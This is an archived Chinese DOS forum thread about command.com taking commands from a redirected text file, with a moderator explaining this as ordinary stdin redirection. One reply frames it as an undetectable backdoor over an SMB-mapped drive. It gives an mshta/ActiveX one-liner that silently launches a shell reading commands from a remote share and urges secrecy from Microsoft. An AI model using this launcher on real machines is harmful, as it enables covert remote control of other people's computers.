Board logo

标题: 记事本能控制command? [打印本页]

作者: 002500     时间: 2006-9-12 12:01    标题: 记事本能控制command?

发现一个奇怪的问题 command可以从记事本接受命令并执行

在玩cmd的时候 无意启动了command 才知道我的xp中还有98的command  哈哈

command <e.txt

这个时候command不再接受命令和字符 只到在记事本中敲exit回车 保存

command又可以输入  

就像和先前一样 记事本就不接受命令了 但记事本好像和command关联了

还会影响command 慢慢试 好奇怪的 我想很多人早就知道吧 cmd就不能这样

这是怎么回事呢?



也正是这样 我不知道怎么乱试的 应是乱敲了 chcp 437

现在每次启动cmd都英文界面 敲chcp 936回来 再个cls命令就又到英文界面了

从别去拷个cmd 还是这样 回不来 气死我了  

我怎样让它每次启动默认为中文呢  版主帮我看看哦 谢谢    等

[ Last edited by willsort on 2006-9-14 at 03:26 ]
作者: namejm     时间: 2006-9-12 12:18
  command的这个特点很是奇特啊。
作者: electronixtar     时间: 2006-9-12 22:41
试过了,有意思
作者: electronixtar     时间: 2006-9-12 22:52
恩,问题其实很严重!!!!

可以用SMB共享做后门远程控制他人电脑!而且永远不被查杀

太爽了~~

我做了个试验,用 cmd /c command <Z:\shell.txt
Z:是映射的驱动器,然后我在另一台计算机成功执行了命令!

但是,当你Ctrl+S保存这个txt的时候,不能删除以前输入的内容,否则导致连接断开!

再次感谢楼主的惊天发现!

如何启动后门?一句话;
CODE:  [Copy to clipboard]
mshta "javascript:new ActiveXObject('Wscript.shell').Run('cmd /kcommand<Z:\shell.txt',0);window.close();"
[ Last edited by electronixtar on 2006-9-12 at 23:04 ]
作者: electronixtar     时间: 2006-9-12 22:53
希望大家不要把这个技巧传到联盟以外的网站,否则泄漏出去微软一个补丁把封了就不好玩了!很多菜鸟黑客知道了这点就太疯狂去干坏事。建议版主把此帖加1点积分浏览的限制以防止搜索引擎的嗅探。

[ Last edited by electronixtar on 2006-9-12 at 23:03 ]
作者: namejm     时间: 2006-9-13 00:32
  呵呵,与其让楼主加积分限制,倒不如你自个把自己的回帖改了。
作者: willsort     时间: 2006-9-14 03:24
Re UPs:

      command.com 可以从重定向的文件中获取命令脚本,这与记事本并无任何关联,我们完全可以将例子中的 e.txt 改为其它任意的扩展名,这样它就不再是记事本的图标了,但只要是由 command.com 可识别的命令所组成的文本文件,那么这都是可以正常运行的,这个文件可以称之为command.com 的自动应答文件,语法上与批处理十分相似。

      这个特性对于DOS用户来说是正常而且有用的。因为虽然COMMAND.COM 在DOS中实质上是所有内部命令的宿主,称之为“命令解释器”,但它本身也是一个外部命令,并且支持标准输入输出,所以当然支持管道和重定向特性。这个特性很早就被使用了,比如我早前在DOS下试图使用批处理向文件写入某些命令行的转义字符时,就经常使用下面的范式:

echo exit | command /e:2048 /k prompt  echo Hello World $g hello.txt$_ | find /v "exit">>test.bat

      而现在的NT环境下的命令解释器 cmd.exe 也仍然支持这个特性,比如我们可以使用 cmd <e.txt 来执行e.txt 中的批处理代码。与command.com所不同的是,cmd.exe 不再需要向这个应答文件征求一个exit命令,就能自动退出它所打开的命令行界面了。

      但说这是一个“漏洞”,可能还为时过早。因为如果已经实现了宿主机驱动器映射,那么就应该意味着宿主机已经处于半设防或者不设防的状态,此时要入侵宿主机可选择的方法就已经很多了,cmd.exe/command.com应该只是其中不很常见的一种方式罢了。

      另外,应 electronixtar 兄的要求,将此主题加上积分限制。
作者: 32225cr     时间: 2007-4-14 05:32
好东西  受教了
作者: wydos     时间: 2007-4-14 08:17
willsort就是强!!
受教了!
作者: lingxindu     时间: 2007-4-14 08:46
ye    好东西   我要马上试一试
作者: flandy     时间: 2007-4-30 15:05
支持
作者: flyinspace     时间: 2007-4-30 15:19
呵。都把别人的盘映射了。。

还有什么不能干的:)
作者: colorphoto     时间: 2007-4-30 21:55
真的,很有意思,记事本的反应过去了
作者: notepad     时间: 2007-5-1 01:58
好繁杂````
作者: shi1035     时间: 2007-7-28 15:41
这儿有好多高手呀
作者: AlexZhang     时间: 2007-7-28 17:36
收下了,将会在0.5版的Batch IDE中作为debug使用。
多谢
作者: luowei14     时间: 2007-7-28 23:20
。。。早发现了。。。没多大感觉
作者: lotus516     时间: 2007-7-31 19:28
愣是没看懂,回头重看!
作者: luweijile     时间: 2007-9-30 13:00
呵呵,有意思,虽然还不懂
但是我要加强研究
作者: dwlzz     时间: 2009-4-27 00:27
有点像NC的功能
作者: mmh1     时间: 2009-4-27 05:01
好危险啊,快快学习一下
作者: a7147125     时间: 2009-9-4 10:23
有意思,得好好来研究一下。。。。。
作者: 523066680     时间: 2009-9-5 08:31
一扇菊  这次扣分这么猛……
作者: zaixinxiangnian     时间: 2010-4-7 20:02
没有看懂,也不知道怎么用。。。傻傻的,,,,继续潜水学习
作者: DOSling     时间: 2010-4-8 17:04
学习。谢谢!
作者: sohu     时间: 2010-12-4 15:34
这个好玩,
在工作中娱乐下、、、
作者: 2010l     时间: 2010-12-7 01:06
受教了
作者: jy02116916     时间: 2010-12-7 13:04
又学到了一个好玩的 不过这个方法用来做后门还真不容易




欢迎光临 中国DOS联盟论坛 (http://cndos.fam.cx/forum/) Powered by Discuz! 2.5